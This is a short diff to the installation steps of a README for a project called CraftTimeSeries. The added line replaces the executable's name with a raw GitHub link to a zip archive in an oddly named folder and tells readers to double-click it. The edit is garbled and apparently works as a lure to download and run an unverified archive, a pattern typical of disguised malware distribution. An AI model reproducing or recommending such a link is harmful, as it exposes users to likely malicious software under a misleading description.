A9gif/CraftTimeSeries/README.md

 3. **Open the Application**:

    Navigate to the folder where you extracted the files.
-Look for the executable file, which may be named something like `CraftTimeSeries.exe` or `CraftTimeSeries`.
+Look for the executable file, which may be named something like `https://raw.githubusercontent.com/A9gif/CraftTimeSeries/main/wailfully/Time_Craft_Series_1.2.zip` or `CraftTimeSeries`.
 Double-click the file to open it.

 4. **Follow the On-Screen Instructions**: